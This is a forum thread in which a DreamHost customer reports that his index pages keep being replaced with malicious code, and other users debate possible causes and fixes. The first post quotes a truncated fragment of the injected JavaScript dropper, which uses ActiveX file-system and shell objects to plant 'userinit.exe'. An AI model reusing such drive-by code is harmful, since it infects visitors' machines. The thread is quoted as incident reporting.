! EMERGENCY ! Exploited host


I have to make the adminsistrators aware of this as soon as possible, I thought it best to post here first as other users may be affected.

I have a bulletin board hosted with dreamhost and users started complaining of a blank page and Firefox just shutting down.

I was unable to check this out until this evening and noticed that a ‘Loading…’ text appeared in the top right then I was redirected to ‘_index.php’ instead of ‘index.php’.

On further investigation the original index.php has been replaced by a Script which exploits users logging into the board. I though it may be a vulnerablity in Vbulletin which I use, but ALL index.html and index.php on all domains and subdomains have been changed.

I replaced the original but they keep being replaced and the original renamed.

the header when viweing source looks like this:

cj=unescape("\");dr="c:"+cj+"Recycled"+cj;k=dr+"userinit.exe";try{g=new ActiveXObject("Scripting.FileSystemObject");v=new ActiveXObject("WScript.Shell");nx=1;if(g.FileExists(k)){ex=g.GetFile(k);if(ex.size>20000)nx=0;}function fl(){return false}document.oncontextmenu when viewing the file downloaded from the server it is all encrypted. [b]PLEASE HELP[/b] I have had to block access to all my sites.


Contact support ASAP… they are the ones that must get the message first and by this forum… is not the fastet way… post a ticket on support on emergency site down or security issues…
Fast ;D


I posted a ticket as soon as I had hit post here.

I hope this isn’t server wide as a lot of users could be infected just by viewing the index.


Which DreamHost server are you on?


Save [color=#CC0000]$50[/color] on DreamHost hosting using promo code [color=#CC0000]SAVEMONEY[/color] ( Click for details )


The chances are good that it was a security flaw in your bulletin board software that was exploited rather than a server-wide exploit. While you’re waiting to hear back from support, I’d definitely check to see if there have been any updates to the software you’re using.


I have checked the Vbuuletin and there is nothing that could be exploited in this way.

The thing is it’s not just index.php of the board, it’s the index.php in the AdminCP and in all other folders of domains I host there are the same… all have been replaced.

This is the code: http://pastebin.com/578958

The server is Atlantic. I emailed support last night and I have had no reply, what the hell are they doing?

This is urgent - anybody that visits any of my sites is under the threat of being hacked by this code.


If files on your other sites have been modified as well, the exploit could be in any code you’re running, not just Vbulletin. Look at everything you’ve installed or written.

If the modified files are being replaced after you remove them, something is doing it, probably from a cron job running every minute or some such. Find this first, then remove the modified files.

In the meantime, to protect your IE-using visitors, disable your site completely. Password protect them from the panel or add this to .htaccess in the root directory of all your sites:

Order deny,allow Deny from all

If you want useful replies, ask smart questions.


ok, now this is constructive advice.

I have moved 5 domains over so far
2 are empty
2 are just an index.html + images (in folder)
1 is vBulletin

How would a cron job be able to change the pages in all the other domain folders? and if it could how would I find out where this is set?


ok, this is just slightly annoying as the response from the Support department was nothing more than ‘Sorry this is your problem’.

These are the measures I have taken:
~Deleted ALL files/boards from all the domains (Everything)
~Changed all FTP accounts to random passwords (confirmation emails haven’t even been opened)
~Applied .htaccess to all Domains/folders
~uploaded a text file in each folder comtaing the word test and renamed to index.html or index.php

At 06:03 Server time all index files were renamed and the usual files appeared a.asp a.html a.php and the ‘test’ index file I left was renamed to _index.php/html



If it’s only affecting you, then it’s your account that’s been compromised, not the entire server.

Did you check your cronjobs?

If you want useful replies, ask smart questions.


[atlantic]$ crontab -l
no crontab for virtualburn


If you are using Version 3.5.4 (released Feb. 21, 06) and if your board is modded you may want to make sure you have the latest mod/hack(s).

If not (and you know that you have no other scripts running on your site,) you may want to post your question over in the VBulletin forum.


If you took the time to read the previous post you would know that this is not a vBulletin issue, this is what the Support said it could be.

I have NO FILES on the server apart from a fake index page.

There are no Cronjobs

All FTP passes have been changed

All dirs have .htaccess set

There is no physical way anybody can get into the server

There are no files present on the server capable of being exploited

All fake index pages were replaced at the same time.

Somebody must have an idea of how this is happeneing, if there are no files on the domains to exploit then it has to be something on the server that is doing this.

I have no idea what to do, I have taken all security measures that the admin panel allows me to, now it is down to the DH admins to check that the server is not infected.


I have taken all security measures that the admin panel allows me to

This may seem obvious, but the obvious things are often overlooked: Have you changed your FTP/SSH password? (and the passwords of any other accounts you’ve given access to, if any)

If you want useful replies, ask smart questions.


Christ all mighty does anybody read…

“…All FTP passes have been changed…”

The FTP passes are the same for SSH access.

My hosting may aswell be locked down - everything is secured, there is nothing on site.


Sounds like a virus or worm heh… did you resend a ticket to support?


Forgive me for skimming at this point. Mea culpa.

The fact remains: If Dreamhost support says it’s your problem, it must not be affecting anyone else on your server. Ergo, your account must be compromised somehow. That said, at this point I’d write back to support (remain calm!) and explain things thoroughly, pointing them to this thread as well as providing a detailed explanation of what’s happening and what you’ve done about it. Politely asking for help will get you much better results that shouting about compromised servers and such.

If you want useful replies, ask smart questions.


It’s probably just someone messing with you because you’re a jerk. Try being less of a jerk.

If it’s only affecting your account (not the whole server) then it would seem that either a) someone has root access to the whole server, but they decided to just mess with a few of your index files, or b) there’s something you’re missing.

Maybe someone put a key logger on your computer and they know your new passwords as soon as you change them.

I have never received a “that’s your problem” type of response from support, so if you did something to trigger that, you might want to try again with a different approach.

You might think you’re smarter than the people that have tried to help you here, but we’re not the ones that can’t use our hosting accounts, are we?

:stuck_out_tongue: Save up to $96 at Dreamhost with the 96DOLLARSOFF promo code.


Talk about hypocrisy. Ignore the jerk and keep us up to date on the situation. I would like to see how this is resolved (or not). I don’t feel like this is the work of a person… don’t think anyone is stupid (bored?) enough to mess with a completely empty website that has a fake index.html.


Yeah. He asks for help and replies with stuff like, “Christ all mighty does anybody read…” when people like kchrist are friendly and try to help him… so I must be the jerk.

Was it a dog? Cat? Because even if it’s a script, that’s the work of a person.

Why would someone, script or not, restrict their own access to a few of one person’s index files? If they have root access (doubt that), they’d do more. If they only have access to his account, then how is that a compromised server? It’s not.

Do you honestly think there is any chance that the server is compromised and DH’s reaction was, “that’s your problem”? Of course not. Or do you think it’s the whole server that got hit and he was the only one out of hundreds of users that noticed the damage?

And if it’s really just someone messing with him and his empty websites, script or not, then it’s possible that his own computer is what’s compromised and someone is getting his passwords as he changes them. Maybe they have his email password and/or NDN ID password. If that’s the case, they can just keep retrieving the new passwords as he creates them. There are plenty of things it can be besides a compromised server. Who knows?

Maybe no one here knows what the problem is, but neither does he, so he probably shouldn’t be giving the people that were trying to help him a hard time. That goes for support, too. I’ve never had a reply like the one he received, so that should pretty much show that his approach isn’t working.

:stuck_out_tongue: Save up to $96 at Dreamhost with the 96DOLLARSOFF promo code.